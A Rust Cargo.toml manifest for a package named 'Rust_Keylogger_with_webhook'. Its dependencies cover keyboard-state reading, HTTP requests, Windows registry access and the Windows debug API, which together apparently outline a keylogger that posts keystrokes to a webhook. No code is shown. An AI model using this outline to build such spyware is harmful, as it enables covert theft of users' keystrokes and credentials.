[package]
name = "Rust_Keylogger_with_webhook"
version = "0.1.0"
edition = "2024"

[dependencies]
device_query = "4.0.1"
chrono = "0.4"
reqwest = { version = "0.12.23", features = ["blocking", "json"] }
serde_json = "1.0"
winreg = "0.55.0"  
winapi = { version = "0.3", features = ["debugapi"] }